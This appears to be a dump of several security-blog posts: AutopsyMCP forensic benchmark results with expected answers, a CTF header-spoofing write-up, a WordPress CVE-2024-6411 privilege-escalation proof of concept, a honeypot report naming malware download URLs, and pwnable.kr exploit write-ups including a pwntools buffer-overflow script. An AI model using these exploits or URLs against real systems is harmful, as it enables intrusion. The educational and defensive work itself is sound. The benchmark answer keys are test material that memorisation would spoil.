Micro-benchmark: Task Definitions \u0026amp; Full Results # Source Image Category Task Question Expected Answer Mode 1 Time Mode 1 Answer Mode 1 Result Mode 1 Steps Mode 2 Time Mode 2 Answer Mode 2 Result Mode 2 Queries Mode 3 Time Mode 3 Answer Mode 3 Result Mode 3 Queries 1 GregSchardt Registry What was the last recorded computer shutdown date/time? August 27, 2004, at 15:46:33 UTC 6:55 2004-08-27 15:46:33.1092164 Z Correct 4 2:21 2004-08-27 at 16:46:27 BST (Event ID 6006 – EventLog service stopped, Record #141) Correct 1 1:04 Friday, 27 August 2004 at 15:46:33 UTC Correct 1 2 GregSchardt Registry What are the IP address and MAC addresses of the computer? 192.168.1.111, 00:10:a4:93:3e:09 2:25 192.168.1.111, 10a4933e09 Correct 3 0:38 Hostname: N-1A9ODN6ZXK4LQ | MAC: 00:10:A4:93:3E:09 | LAN IP: 192.168.1.111 | APIPA: 169.254.242.213 Correct 1 1:53 192.168.1.111 (subnet 255.255.255.0, gateway 192.168.1.1) Partial 1 3 GregSchardt Registry List the network cards used by this computer (1) Compaq WL110 Wireless LAN PC Card (2) Xircom CardBus Ethernet 100 + Modem 56 0:55 Xircom CardBus Ethernet 100 + Modem 56, Compaq WL110 Wireless LAN PC Card Correct 2 8:56 Xircom CardBus Ethernet, Agere Orinoco PC Card Partial 1 1:11 Xircom CardBus Ethernet 100 + Modem 56 — Ethernet Interface, Xircom CardBus Ethernet 100 + Modem 56 — Modem Interface Partial 1 4 GregSchardt Browser What websites was the suspect (Mr. Evil) accessing? mobile.msn.com (MSN Hotmail email service) 0:45 mobile.msn.com (and others) Correct 4 0:34 mobile.msn.com (and others) Correct 1 0:33 mobile.msn.com (and others) Correct 1 5 Stanley File Discovery Are there any files \u0026gt;50MB in the image? If so, what are their names? GCR 2015 version.doc, GCR.doc 0:59 GCR 2015 version.doc, GCR.doc Correct 3 1:55 $Bad/$Bad-slack: ~378 MB each (NTFS metadata) | IMG_20171119_194709.jpg: 3.4 MB | sendmail.exe: 911 KB Not Found 1 0:56 $BadClus:$Bad 378.3 MB, $BadClus:$Bad-slack 378.3 MB, curly_1709_librivox.zip 149.5 MB, JRE.cab 96.4 MB, GCR 2015 version.doc 92.4 MB, GCR.doc 92.4 MB Correct 1 6 Stanley System What is the sector length of vol3 in the Stanley.E01 image? 614400 0:08 614400 Correct 3 0:10 3,504 sectors and 1,794,048 bytes Incorrect 1 0:17 614400 Correct 1 7 Norman Metadata Can you determine the make and model of camera used for the rose picture? NIKON CORPORATION, NIKON D40 0:11 NIKON CORPORATION, NIKON D40 Correct 3 0:16 NIKON CORPORATION, NIKON D40 Correct 1 0:21 NIKON CORPORATION, NIKON D40 Correct 1 8 Norman User Activity In which two years has the bulk of activity taken place in the DFI? 2014 and 2017 0:37 2014 and 2017 Correct 3 1:25 2014 and 2017 Correct 1 1:12 2015 and 2017 Partial 1 9 IPTheft File Discovery Are there files containing confidential corporate data? Any evidence of obfuscation? Yes 2:07 Yes Correct 5 2:57 Yes Correct 1 0:03 Yes Correct 1 10 Animal Communication Is there evidence of James Jones communicating with third parties? Yes 0:33 Yes Correct 3 0:34 Yes Correct 1 0:41 Yes Correct 1 Full Case Investigation: Task Definitions \u0026amp; Full Results (Beethomahler) # Category Task Question Expected Answer Mode 1 Time Mode 1 Answer Mode 1 Result Mode 1 Steps Mode 2 Time Mode 2 Answer Mode 2 Result Mode 2 Queries Mode 3 Time Mode 3 Answer Mode 3 Result Mode 3 Queries 1 Verification What are the last 4 digits of the verified SHA1 hash? 8326 0:11 8326 Correct 3 2:11 N/A Not Found 1 1:28 N/A Not Found 1 2 Device Were any external devices attached? If so, provide the device ID. 5\u0026amp;18f54cb7\u0026amp;0\u0026amp;1 0:14 5\u0026amp;18f54cb7\u0026amp;0\u0026amp;1 Correct 3 0:16 5\u0026amp;18f54cb7\u0026amp;0\u0026amp;1 Correct 1 0:16 5\u0026amp;18f54cb7\u0026amp;0\u0026amp;1 Correct 1 3 Browser Did the suspect bookmark any non-contraband related web pages? No 0:12 No Correct 2 0:10 No Correct 1 0:10 No Correct 1 4 Registry On what date was the OS installed? (YYYY-MM-DD) 2023-02-11 0:10 2023-02-11 Correct 2 0:11 2023-02-11 Correct 1 0:14 2023-02-11 Correct 1 5 Registry OS install date in original UNIX time format? 1676092305 0:41 1676092305 Correct 3 0:05 1676092305 Correct 1 0:18 1676092305 Correct 1 6 Registry What are the last 5 digits of the OS Product ID? 85033 0:02 85033 Correct 1 0:05 85033 Correct 1 0:05 85033 Correct 1 7 System What are the first 8 digits of the device ID? 6ce70ff9 0:16 6ce70ff9 Correct 1 0:09 6ce70ff9 Correct 1 0:05 6ce70ff9 Correct 1 8 System What is the timezone of the seized computer? Europe/London 0:02 Europe/London Correct 1 0:06 Europe/London Correct 1 0:06 Europe/London Correct 1 9 Anti-forensics When did the suspect research keeping files private/hidden? (YYYY-MM-DD HH:MM:SS GMT) 2023-02-17 15:20:58 GMT 0:23 2023-02-17 15:20:58 GMT Correct 1 1:19 2023-02-17 15:20:58 GMT Correct 1 1:20 2023-02-17 15:20:58 GMT Correct 1 10 File Transfer Which file transfer service was used to deliver files to the suspect? WeTransfer 0:16 WeTransfer Correct 3 0:14 WeTransfer Correct 1 0:18 WeTransfer Correct 1 11 File Transfer What are the first 8 characters of the received container\u0026rsquo;s filename? 71cc3213 0:37 71cc3213 Correct 5 0:07 71cc3213 Correct 1 0:07 71cc3213 Correct 1 12 File Transfer When was the container saved to disk? (YYYY-MM-DD HH:MM:SS GMT) 2023-02-23 10:45:36 GMT 0:46 2023-02-23 10:45:36 GMT Correct 3 0:10 2023-02-23 10:45:36 GMT Correct 1 0:16 2023-02-23 10:45:36 GMT Correct 1 13 Communication Who sent the file to the suspect? DinnyDjanko 0:01 DinnyDjanko Correct 1 0:08 DinnyDjanko Correct 1 0:13 DinnyDjanko Correct 1 14 Communication What was the suspect\u0026rsquo;s WeTransfer MFA code? 622191 0:23 622191 Correct 2 0:53 622191 Correct 1 3:03 622191, 335306, 335014 Correct 1 15 File Analysis What is the full name of the largest file in the WeTransfer container? McFarlane-BTAS-Batman-Catwoman-Version-2-header.jpg 0:41 McFarlane-BTAS-Batman-Catwoman-Version-2-header.jpg Correct 4 0:53 McFarlane-BTAS-Batman-Catwoman-Version-2-header.jpg Correct 1 1:18 McFarlane-BTAS-Batman-Catwoman-Version-2-header.jpg Correct 1 16 Metadata A photo contains GPS coordinates — identify the street address. Burton Road 1:27 Moon Flower Ct or Burton Road Correct 4 2:32 Brown Trail Incorrect 1 1:47 39.9025722, -97.2622833 Incorrect 1 17 User Activity What did the suspect share to their VM? Folder names? Downloads, Malware 0:45 Malware, Downloads Correct 2 2:34 Malware, Downloads Correct 1 2:12 Malware, Downloads Correct 1 18 Malware Who was malware sent to, what was it, and when? (who_what_when) dinnydjanko@gmail.com, Solimba, 2023-03-06 06:57:26 2:51 dinnydjanko@gmail.com_piccies.exe_2023-02-28_13:03:48 Incorrect 4 3:40 dinnydjanko@gmail.com_piccies.exe_2023-02-28_13:03:48 Incorrect 1 1:39 dinnydjanko@gmail.com_Multi:Agent-ES_2023-02-28_13:03:48 Incorrect 1 19 Application WMP installation error code and time? (errorcode_HH:MM:SS) 0x80070005, 21:12:15 2:41 0x80070005, 21:12:15 Correct 3 0:18 0x80070005, 21:12:15 Correct 1 4:45 c000001d_12:20:55 Incorrect 1 20 Browser How many times was wetransfer.com opened (excl. refreshes)? Latest timestamp? 3, 2023-03-06 06:03:11 8:38 3, 2023-03-06 06:03:11 Correct 6 3:09 N/A Not Found 1 1:46 4, 2023-03-06 06:03:11 Partial 1 The full dissertation may be available on request once my results are finalized. Code is available on GitHub. Feel free to reach out if you have related work, questions, or feedback.\n","permalink":"https://nhantouli.com/posts/autopsymcp/","summary":"Building and evaluating AutopsyMCP: a natural language interface for Autopsy built on the Model Context Protocol. What worked, what failed, and what it means for AI in forensic workflows.","title":"AutopsyMCP"},{"content":"This year\u0026rsquo;s IntakeCTF for the Warwick Cyber Security Society included a challenge that I created. I\u0026rsquo;ll be going over the challenge and its solution, and I hope participants found it fun \u0026amp; intuitive.\nWeb: Rate the Vibes Description: The society has set up a website to gather feedback to improve future events and competitions. Due to a misconfiguration, you may find a way to access more information than intended. - 500 points\nSolution: You start with a simple web app that collects feedback through a form and redirects you to a thank you page.\nThe first step to solving the challenge was to take a look at the homepage\u0026rsquo;s source code. By viewing the source, you’d discover a comment for an outdated endpoint that was once used to store feedback data.\nAccessing this endpoint returns a JSON response like so:\n{ \u0026#34;message\u0026#34;: \u0026#34;Archive has been disabled. No data here.\u0026#34;, \u0026#34;status\u0026#34;: \u0026#34;error\u0026#34; } This clue points to the existence of the /submissions endpoint, which you could also find using a directory brute-forcing tool like Gobuster.\nOnce the /submissions endpoint is identified, the goal is to bypass the 403 Forbidden message to gain access to all user feedback.\nA common bypass technique is to try different HTTP methods such as GET, POST, PUT, etc. If a POST request is sent to /submissions, you get a hint to think about the request\u0026rsquo;s origin.\n% curl -X POST {ip}:{port}/submissions { \u0026#34;message\u0026#34;: \u0026#34;POST request received, but nothing special here. Are you sure you\u0026#39;re coming from the right place?\u0026#34; } The correct method to bypass the 403 error is setting the X-Forwarded-For header to 127.0.0.1. This simulates a misconfigured environment where requests originating from localhost are trusted and can bypass IP-based blocklists.\nThe following command can be used to retrieve the flag: curl -H \u0026quot;X-Forwarded-For: 127.0.0.1\u0026quot; http://{ip}:{port}/submissions, or manually set the header using a tool like Burp Suite and send the request.\nFlag: Intake24{******************}\n","permalink":"https://nhantouli.com/posts/intakectf-2024/","summary":"Writeup for the challenge I created for this year\u0026rsquo;s IntakeCTF at Warwick.","title":"CyberSoc IntakeCTF 2024"},{"content":" Update (2024-11-13): Expanded on this topic during a co-presented talk for the Cyber Security Society. See more here.\nCVE reversing is the process of creating a proof-of-concept (PoC) based on the differences between the code of a vulnerable software version and its patched version. By looking at the diffs, it\u0026rsquo;s possible to identify the vulnerability in the original code.\nI recently obtained two CVEs for stored XSS and SQLi in a plugin with over 400 active installations (CVE-2024-43967, CVE-2024-43966). These vulnerabilities required at least Editor or Admin level privileges. By practicing CVE reversing more often, I aim to better detect more complex and high-impact vulnerabilities moving forward.\nI will be examining CVE-2024-6411. The plugin ProfileGrid was vulnerable to privilege escalation and was classified as a CVSS 8.8 issue.\nPlugin Description ProfileGrid is a WordPress user profile and membership plugin. It integrates with WooCommerce and bbPress, supports content restriction, sign-up pages, blog submissions, notifications, social activity, private messaging, etc.\nIssue Description The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 5.8.9. This is due to a lack of validation on user-supplied data in the \u0026lsquo;pm_upload_image\u0026rsquo; AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their user capabilities to Administrator.\nWordfence has also published a technical analysis regarding this issue.\nTechnical Details Looking at the CVE entry, we can see that the vulnerable version is \u0026lt;= 5.8.9 and it was patched in version 5.9.0. We can to navigate to https://plugins.trac.wordpress.org/log/profilegrid-user-profiles-groups-and-communities/trunk and select the changes in 5.8.9 and 5.9.0.\nThe Trac is primarily used to monitor all the code changes in a plugin or theme. It can be a useful tool to review changes and see if any vulnerabilities were patched or introduced in the latest version.\nClicking on “View Changes” returns a page that contains all the changes in the code.\nReviewing the changes, we come across the update_user_meta function in /public/partials/crop.php.\nThis function is called whenever a user attempts to update their profile picture. It takes the user ID, the metadata key, and the new value to set or modify that metadata field. Meta keys are a WordPress-specific feature used to store custom fields and data for different WordPress objects like posts, users, and comments.\nIn the ProfileGrid plugin, the pm_user_avatar meta key is specifically used to store a user’s avatar information. If the plugin does not enforce proper validation on this $_POST request, an attacker may be able to set the user_meta field to an arbitrary value (i.e. wp_capabilities).\nThe pm_upload_image() function in the Profile_Magic_Public class handles the upload, editing, or deletion of the user’s profile picture.\n1681public function pm_upload_image() { 1682 require \u0026#39;partials/crop.php\u0026#39;; 1683 die; 1684} This function includes the crop.php file which handles the actual request processing. It is also linked to an AJAX action that manages profile picture uploads:\n336$this-\u0026gt;loader-\u0026gt;add_action(\u0026#39;wp_ajax_pm_upload_image\u0026#39;, $plugin_public, \u0026#39;pm_upload_image\u0026#39;); When this AJAX action is triggered, it loads the crop.php file, where the the call to update_user_meta() is also performed. The changes between versions 5.8.9 and 5.9.0 show us how the vulnerability was mitigated and how we could potentially exploit it.\nMitigation We can see that in version 5.9.0, the vulnerability was mitigated by introducing additional validation checks. Specifically, the changes ensure that:\nThe user_idin the request matches the ID of the currently logged-in user ($current_user-\u0026gt;ID). The user_meta field is explicitly restricted to pm_user_avatar. These changes make it so that only the profile picture metadata can be updated and only by the legitimate user.\nExploitation Before the fix, the lack of validation on the user_meta field allowed for potential exploitation as an attacker could set the field to wp_capabilities and provide a value that grants Administrator privileges (wp_capabilities is a meta key that stores user roles and permissions). The exploit requires an attacker to be an authenticated user with Subscriber-level access and above \u0026ndash; as only they would have existing profiles and be able to trigger the AJAX action.\nPoC We login as a Subscriber user and attempt to update our profile picture.\nUsing Burp Suite we can capture the request made when we click on \u0026ldquo;Crop \u0026amp; Save\u0026rdquo;.\nWe set user_meta to wp_capabilities and set the attachment_id to an array that gives an attacker administrator privileges.\nSo, we changed user_meta from pm_user_avatar to wp_capabilities and changed attachment_id from 367 to [administrator]=1.\nAfter sending the request, the page refreshes and the cover image updates to an image associated with Administrator accounts. We can also notice the toolbar at the top of the WordPress dashboard which now includes options and features that are available only to Administrators.\nGoing to the users page in the WordPress dashboard confirms that previously Subscriber-level user now has the Administrator role, giving them full control over the WordPress site.\nConclusion We have seen how insecure implementation of the pm_upload_image() function in the ProfileGrid plugin led to a critical privilege escalation vulnerability. The plugin developers have addressed this issue in version 5.9.0 by implementing stricter control over the metadata that can be updated through this function. This reinforces the importance of input validation in development \u0026ndash; never trust, always verify.\nTransitioning from standard web application testing to code review, especially for WordPress plugins, can be pretty challenging if you\u0026rsquo;re not familiar with the intricacies of WordPress. This process offers a way to better your understanding and become more proficient at identifying the different ways vulnerabilities can occur within this ecosystem.\n","permalink":"https://nhantouli.com/posts/wp-cve-reversing/","summary":"Reversing CVEs in WordPress Plugins to learn more complex exploitation techniques.","title":"WordPress CVE Reversing"},{"content":"T-Pot is an open-source honeypot solution developed by Telekom Security. It supports 20+ honeypots and uses the Elastic Stack to visualize the data collected. I\u0026rsquo;ve collected about 3 weeks worth of historical data and activity logs which should be sufficient for a review.\nIn regards to the setup, I hosted T-Pot on the cloud using Vultr with the server location set to London. Ubuntu 24.04 LTS was the chosen OS, and had 4 vCPUs, 8 GB memory, 6 TB bandwidth, 180 GB NVMe storage, and the hostname srv-data01.\nIf you don\u0026rsquo;t already know what a honeypot is, it is a decoy system or server designed to attract attackers and study their TTPs (tactics, techniques, procedures). Honeypots can be classified by the level of interactivity provided to adversaries, this includes low-interaction, medium-interaction, and high-interaction. They can also be deployed internally (inside a LAN) or externally (exposed to the internet), in our case, the honeypot is deployed externally.\nT-Pot is designed to be low maintenance and can be considered a medium-interaction honeypot. Although it has been deployed for a shorter period (~3 weeks), it can still collect detailed attack patterns and signatures.\nRemote Access and Tools Once T-Pot is up and running, the landing page can be accessed via https://\u0026lt;your.ip\u0026gt;:64297 which provides access to the honeypot data along with a couple of other tools.\nSince the logs from the honeypots are forwarded to Elasticsearch and displayed in Kibana, our main focus will be on Kibana as that is where the bulk of the honeypot data is available for analysis.\nAnalyzing the Data Kibana Dashboard The above screenshot is the Kibana dashboard for the main T-Pot honeypot dashboard. In the 23~ days T-Pot was running for, approximately 3,450,000 attacks were collected. There\u0026rsquo;s a lot to unpack here, some of the key findings:\nCowrie and Ddospot were the top two most targeted honeypots, accounting for more than three-quarters of the total attacks. The top five countries from which attacks originated were the United States, China, Hong Kong, Russia, and France. Examining the Honeypot Attacks Histogram and the Attacks by Honeypot Histogram, we can see that the spikes in the data are primarily attributable to DDoS attacks. The top ports accessed were 123 (NTP), 22 (SSH), 445 (SMB over IP), 1433 (MSSQL). The data also reveals the top Attackers\u0026rsquo; ASN and Source IP. Additionally, it shows the credentials used in access attempts which we will investigate further when discussing Cowrie. We can look into the reputation of the source IPs involved in these attacks:\nThe T-Pot dashboard also shows Suricata (IDS) results, giving us a look at indicators of compromise (IoCs) through the top detected CVEs and alert signatures.\nEach signature corresponds to a particular type of attack pattern that Suricata is designed to detect.\nCowrie While the previous data gives us a good overall picture, the data collected by the Cowrie honeypot will allow us to better understand specific threats and attacker behavior.\nCowrie is an SSH/Telnet honeypot which logs brute force attacks and shell interaction performed by the attacker.\nBelow, we can see the ports targeted in relation to the countries the attacks originate from.\nClearly SSH is the more commonly targeted service with significantly more attacks compared to Telnet (which accounts for just 6.2% of the attacks). While Telnet is old and inherently vulnerable, it is still widely used by some legacy systems which explains why it is still a point of interest for attackers.\nWe can also look at the credentials used to access the honeypot:\nFrequently attempted usernames include ones like admin, root, and server, with passwords used such as admin, password, and root. These are being used commonly used due to their prevalence in default accounts with default or weak passwords.\nHowever, we also see the combination of 3245gs5662d34 and 345gs5662d34 commonly being used as passwords. These passwords initially seemed very random, but I later discovered that similar cases have been observed on many other honeypots. Since they don\u0026rsquo;t correspond to any known attack vectors, the best guess is that this might be a honeypot detection strategy.\nMoving on, once the attackers obtain a shell on the system, all their command line inputs are logged:\nGenerally, the commands show attempts to gather system information and modify configurations. This would help attackers maintain access and decide which exploit to launch. Although most of these commands likely come from bots, this information can provide valuable insights about the attackers\u0026rsquo; TTPs \u0026ndash; whether they are human or automated.\nCowrie also collects the types of files attackers are trying to bring into the system. The most frequently accessed URIs used by attackers to download files are:\nSubmitting these to VirusTotal:\nWe find that http://37.44.238.67/bins.sh is associated with the GAFGYT (or BASHLITE) malware, and http://87.121.112.42/ssh.sh is associated with the MIRAI botnet. Both pose a serious threat to vulnerable IoT devices.\nCowrie also lists the top downloaded files, regardless of where they were downloaded from:\nThe clean.sh script erases traces of malware by cleaning crontab entries, stopping mining services, and deleting temporary files. In the past, it has been seen used for searching for other coin miners and malware to clean/remove.\nThe redtail file has been downloaded in various architectures including .arm7, .arm8, .x86_64, .i686 \u0026ndash; with further research revealing it to be a cryptomining malware.\nNot visible in the image, two other downloads were also observed, sshd (OpenSSH Daemon) and eyshcjdmzg (Linux Trojan - XorDDoS).\nWrapping It Up There’s still a lot that can be done with the data from the honeypot. This research demonstrates just how sophisticated threat actors have become with their use of automation and botnets. In the future, I hope to run it for a longer period to collect even more actionable data. This could help in discovering any undetected malware samples which I could attempt to reverse engineer. With an extended collection period, we may see even more interesting and valuable data from the other honeypots that T-Pot deploys.\nThank you for reading!\n","permalink":"https://nhantouli.com/posts/t-pot/","summary":"Studying adversary tactics with a honeypot that\u0026rsquo;s been running for less than a month.","title":"Threat Intelligence with T-Pot"},{"content":"This post details my writeups for a few of the challenges at pwnable.kr \u0026ndash; a wargame site for pwn challenges. As I make my way through the the other challenges I\u0026rsquo;ll periodically update this page with additional writeups. I may also work through the Nightmare course to get better at binary exploitation/reverse engineering as I\u0026rsquo;ve heard positive feedback about it.\nfd: Mommy! what is a file descriptor in Linux? ssh fd@pwnable.kr -p2222 (pw:guest) Solution: There are 3 files provided: the binary fd, the source code fd.c and a flag file flag.\nAttempting to cat out the flag results in a Permission denied error due to a lack of permissions on the file. Therefore, we need to work with the fd binary. The source code, fd.c:\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;string.h\u0026gt; char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc\u0026lt;2){ printf(\u0026#34;pass argv[1] a number\\n\u0026#34;); return 0; } int fd = atoi( argv[1] ) - 0x1234; int len = 0; len = read(fd, buf, 32); if(!strcmp(\u0026#34;LETMEWIN\\n\u0026#34;, buf)){ printf(\u0026#34;good job :)\\n\u0026#34;); system(\u0026#34;/bin/cat flag\u0026#34;); exit(0); } printf(\u0026#34;learn about Linux file IO\\n\u0026#34;); return 0; } So, we need to pass a number as argv[1], which will be converted to an integer using the atoi function. The program then subtracts 0x1234 from this integer to get the file descriptor fd. It reads up to 32 bytes from fd into the buffer buf. If the content of buf is equal to LETMEWIN\\n, the program will print the flag.\nIn Unix operating systems, the standard file descriptors are: 0,1,2 for stdin, stdout, and stderr respectively.\nIf we manage to set the file descriptor to 0 (standard input), we can then type in the LETMEWIN\\n string. 0x1234 is 4660 in decimal. Passing 4660 in decimal sets fd to 0 and causes the read(fd, buf, 32); line to read from standard input. Entering LETMEWIN succesfully returns the flag as !strcmp(\u0026quot;LETMEWIN\\n\u0026quot;, buf) checks to see whether the provided input is equal to the string.\nFlag: mommy! I think I know what a file descriptor is!!\ncollision: Daddy told me about cool MD5 hash collision today. I wanna do something like that too! ssh col@pwnable.kr -p2222 (pw:guest) Solution: Once again, there are three files provided: col, col.c, and flag. The souce code, col.c:\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i\u0026lt;5; i++){ res += ip[i]; } return res; } int main(int argc, char* argv[]){ if(argc\u0026lt;2){ printf(\u0026#34;usage : %s [passcode]\\n\u0026#34;, argv[0]); return 0; } if(strlen(argv[1]) != 20){ printf(\u0026#34;passcode length should be 20 bytes\\n\u0026#34;); return 0; } if(hashcode == check_password( argv[1] )){ system(\u0026#34;/bin/cat flag\u0026#34;); return 0; } else printf(\u0026#34;wrong passcode.\\n\u0026#34;); return 0; } Based on the code we learn that to get the flag, we need to provide a specific 20-byte passcode such that the check_password function returns the hashcode value 0x21DD09EC.\nProviding 0x21DD09EC or 568134124 (0x21DD09EC in decimal) as the passcode obviously won\u0026rsquo;t work as it is not 20 bytes. Providing something like 'AAAAABBBBBCCCCCDDDDD' also won\u0026rsquo;t work as although 20 bytes, is not the intended passcode. Therefore, we need to better understand the check_password function which is the main part of the program:\nunsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i\u0026lt;5; i++){ res += ip[i]; } return res; } The input p is cast to an int*, meaning the function treats the input string p as an array of integers. Each int is 4 bytes, so the function will read 5 integers from the 20-byte string (5 * 4 = 20). The function sums up these 5 integers and returns the result. So, we need to supply an input which will produce a valid passcode that meets the required conditions. The goal is for this sum to equal the target hashcode 0x21DD09EC (568134124 in decimal).\nCalculation: Divide the target hashcode by 5:\n568134124/5 = 113626824 Multiply the base integer by 4:\n4 * 113626824 = 454507296 Subtract this from the target to find the fifth integer:\n568134124 - 454507296 = 113626828 The integers are 113626824 repeated four times and 113626828 once \u0026ndash; which we can use to craft the passcode. In hexadecimal these are:\n113626824 -\u0026gt; 6c5cec8 113626828 -\u0026gt; 6c5cecc These hexadecimal values represent the bytes that need to be packed into the passcode. In little-endian format, these are \\xc8\\xce\\xc5\\x06 and \\xcc\\xce\\xc5\\x06.\nYou might be wondering why we divided by 5 and then calculated the fifth integer separately. This is due to the division of the target hashcode by 5. When we divide 568134124 by 5, we get a non-integer result: 113626824.8. This is not a whole number and integers must be whole numbers. If we use four equal integers and one different integer, we can calculate the total sum to match the target hashcode exactly.\nWe can use Python to add them up into a string to pass in:\npython -c \u0026#39;print \u0026#34;\\xc8\\xce\\xc5\\x06\u0026#34; * 4 + \u0026#34;\\xcc\\xce\\xc5\\x06\u0026#34;\u0026#39; Using that as input to col:\nFlag: daddy! I just managed to create a hash collision :)\nbof: Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at : nc pwnable.kr 9000 Solution: As the name of the challenge suggests, we are going to be exploiting a buffer overflow. The source code of the binary bof, bof.c:\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; void func(int key){ char overflowme[32]; printf(\u0026#34;overflow me : \u0026#34;); gets(overflowme);\t// smash me! if(key == 0xcafebabe){ system(\u0026#34;/bin/sh\u0026#34;); } else{ printf(\u0026#34;Nah..\\n\u0026#34;); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; } The vulnerability exists where gets(overflowme) is used as gets does not perform bounds checking. This means that if we input more than 32 characters, it will overflow the overflowme buffer and overwrite adjacent memory. From the code we can see that if the value of key is 0xcafebabe, it calls system(\u0026quot;/bin/sh\u0026quot;) to open a shell.\nWe start by using gdb to disassemble the program:\nWe can see when func is disassembled, the comparison for the value of key happens at the cmp instruction. So, we can set a breakpoint there using break *func+40. We then run the program and input a bunch of \u0026lsquo;A\u0026rsquo; characters.\nWe inspect the stack by issuing the x/50wx $esp command to show 50 words (200 bytes) from the stack pointer ($esp).\nFrom the output, we can see 0xdeadbeef which is what we want to overwrite, and our input of \u0026lsquo;A\u0026rsquo;s (0x41 in hex). To determine the offset, the exact amount of \u0026lsquo;A\u0026rsquo;s we require is the distance from the start of overflowme to the key. We do this by counting the byte sequence from the start of the overflowme buffer to the key variable in the stack dump. When we previously ran the program, we inputted 48 \u0026lsquo;A\u0026rsquo;s. Notice that when we inspect the stack, there is only a 4-byte block of memory remaining until we reach 0xdeadbeef. Therefore, an additional 4 \u0026lsquo;A\u0026rsquo;s would allow us to reach the key variable \u0026ndash; so 52 bytes in total are needed to overflow the buffer.\nWe write a script using pwntools for the exploit:\nfrom pwn import * payload = b\u0026#39;A\u0026#39;*52+p32(0xcafebabe) # the payload with 52 \u0026#39;A\u0026#39;s followed by the little-endian representation of 0xcafebabe r = remote(\u0026#39;pwnable.kr\u0026#39;,9000) r.sendline(payload) r.interactive() We run this and successfully get a shell on the machine which allows us to cat out the flag:\nFlag: daddy, I just pwned a buFFer :)\nflag: Papa brought me a packed present! let\u0026#39;s open it. Download : http://pwnable.kr/bin/flag This is reversing task. all you need is binary Solution: For this challenge we are given one file named flag. Attempting to run it will return a Permission denied error as it is not an executable yet. We give it permissions and attempt to run it:\nIf we take a look at the binary we can see that it has no section header:\nI initially thought of using gdb to try and disassemble the program but that did not go anywhere as there was no symbol table or debugging information.\nI then used strings to parse through the file, which at first returned illegible/garbled output until I came across the following line:\nSo, we learn that the file is packed with the UPX executable packer. A packed file is simply a file in a compressed format. However, packing is also a common obfuscation technique used by malware authors to hide their malicious code and evade detection. As the specific packer for this file is known, we can download UPX to unpack it and reveal the actual content of the binary.\nSo, I proceeded to install upx and ran upx -d to unpack the file:\nRunning file flag now shows that the file is not stripped:\nThus, the actual content of the binary should now be revealed and running strings on the unpacked file returns a much more readable output.\nUsing gdb to disassemble the program:\nNotice the line with the comment written for the address of the flag, # 0x6c2070. The flag contents are being copied into rdx. We can issue the command x/s *0x6c2070 to dereference the pointer stored at the address and print the string located at the resulting address.\nUsing Ghidra: Alternatively, we could have achieved this using Ghidra. Once the unpacked binary is loaded, going to the main function will present the following:\nWe have the listing window which shows the disassembled code of the binary, as well as the decompile window to the right which translates the assembly code into a pseudo C code. If you take a close look, the listing window already shows the flag, but ignoring that for a second, the decompile window shows the flag variable being defined on line 9. When we click it we get:\nThese entries look like a reference to a string, we click on the reference to see what the string value is and obtain the same flag:\nFlag: UPX...? sounds like a delivery service :)\n","permalink":"https://nhantouli.com/posts/pwnable-kr-writeups/","summary":"\u003cp\u003e\u003cem\u003eThis post details my writeups for a few of the challenges at \u003ca href=\"http://pwnable.kr\"\u003epwnable.kr\u003c/a\u003e \u0026ndash; a wargame site for pwn challenges. As I make my way through the the other challenges I\u0026rsquo;ll periodically update this page with additional writeups. I may also work through the \u003ca href=\"https://guyinatuxedo.github.io/\"\u003eNightmare\u003c/a\u003e course to get better at binary exploitation/reverse engineering as I\u0026rsquo;ve heard positive feedback about it.\u003c/em\u003e\u003c/p\u003e\n\u003ch1 id=\"fd\"\u003efd:\u003c/h1\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eMommy! what is a file descriptor in Linux?\nssh fd@pwnable.kr -p2222 (pw:guest)\n\u003c/code\u003e\u003c/pre\u003e\u003ch3 id=\"solution\"\u003eSolution:\u003c/h3\u003e\n\u003cp\u003eThere are 3 files provided: the binary \u003ccode\u003efd\u003c/code\u003e, the source code \u003ccode\u003efd.c\u003c/code\u003e and a flag file \u003ccode\u003eflag\u003c/code\u003e.\u003c/p\u003e","title":"pwnable.kr writeups"},{"content":"This is a write-up for the picoCTF challenge “flag_shop”. PicoCTF is a CTF (Capture the Flag) platform created by Carnegie Mellon University to solve challenges in six different cyber security domains including web exploitation, reverse engineering, binary exploitation, and more. Writeups for this challenge were fragmented and lacked detail, so I took a crack at it to help bring some clarity!\nDescription: Solution: In this challenge we deal with a simple flag store and are provided its source written in C.\nThe service provides three options:\nCheck Account Balance Buy Flags Exit The second option contains 2 flag types: fake flags and a real flag. The real flag costs $100,000, but our starting balance is a mere $1100. How should we proceed? The source code will provide direction.\n1#include \u0026lt;stdio.h\u0026gt; 2#include \u0026lt;stdlib.h\u0026gt; 3int main() 4{ 5 setbuf(stdout, NULL); 6 int con; 7 con = 0; 8 int account_balance = 1100; 9 while(con == 0){ 10 11 printf(\u0026#34;Welcome to the flag exchange\\n\u0026#34;); 12 printf(\u0026#34;We sell flags\\n\u0026#34;); 13 14 printf(\u0026#34;\\n1. Check Account Balance\\n\u0026#34;); 15 printf(\u0026#34;\\n2. Buy Flags\\n\u0026#34;); 16 printf(\u0026#34;\\n3. Exit\\n\u0026#34;); 17 int menu; 18 printf(\u0026#34;\\n Enter a menu selection\\n\u0026#34;); 19 fflush(stdin); 20 scanf(\u0026#34;%d\u0026#34;, \u0026amp;menu); 21 if(menu == 1){ 22 printf(\u0026#34;\\n\\n\\n Balance: %d \\n\\n\\n\u0026#34;, account_balance); 23 } 24 else if(menu == 2){ 25 printf(\u0026#34;Currently for sale\\n\u0026#34;); 26 printf(\u0026#34;1. Defintely not the flag 